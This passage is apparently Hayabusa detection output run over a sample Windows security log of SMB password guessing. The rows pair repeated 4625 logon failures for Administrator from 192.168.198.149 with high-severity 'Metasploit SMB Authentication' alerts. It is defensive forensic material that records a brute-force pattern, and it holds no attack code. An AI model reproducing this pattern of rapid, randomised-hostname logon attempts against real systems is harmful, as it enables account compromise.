Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 795b7XqsxokIGJyM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1BmnyTsmP2XqMzf1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.172 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NB3xsYe3RcPXhDib : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.221 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yxN9i8exdO2h4oa7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.264 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vjcQaeuo4f8wFXhv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.351 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zCzr77BhliB4KKeb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.351 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z558005RepKaO1zZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.448 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9HFzW25mJz4JLkv7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.448 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.490 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y7J8m97GQWt2cbSs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.490 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJrVwcpABBaZ8cyY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.545 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VcDw3I4BaFLdIeCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: egEpV9aAuCFjwx2I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: th0ZLWF4YeOaNnkK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ahrOLfdy6DCQ9SfO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xiooSdP5eib8PUE3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.751 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s6nQ2jp9IGYnGeyD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.794 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ejMtyR5QNdJFhw1W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.839 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e50kO0aVhfw5np5T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.873 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 176XyLw6IhEI6NuD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.913 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KXCzCSSFvpbWNJFd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XhHRuZYlH8hekaKc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZGIUBFRMQ3OBbOA0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.026 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R7CTT5g1w58eRRlS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.077 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JmVccmad66uOK9ox : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.117 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.163 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t1jlT6kEcs14dcNZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.163 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rBty5jOGkkZSZEyD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Ci7YUsO5MtFkDSW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.245 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.347 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 12JToliq9mmAuMTQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.347 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lw9AgAvBGWoXBlim : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.381 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ReGDyvRpGknAKqqB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.418 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6mdUn8na4asRfpJP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.469 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7Wm5p4HnNCbkyh2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MQZwerVd6E08X8Ou : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbDjtLKoX5Q77bn5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O7BNKHiPjzJKCaDk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.669 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.714 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HHqBI8bzZn5VO9gq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.714 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xz2ZO3b3QSh6Rdqt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.757 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IEfdhrwbTfCpCXKC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.797 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kc0LuQzAmQTIF1X3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WMZ70YmzpVp2h8mY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.896 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FFVr3Amq6mA3umiu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hnN15vqZcww8pqTK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.985 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.027 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sSuMRF1txQ9g2Mwi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.027 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tUuapChhs4CGO1cS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.073 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dIMr0hjIkwD8AaEG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.119 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8ww9HMQX0cqmolYQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.173 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJRRZ5e9lARVZDar : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.210 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 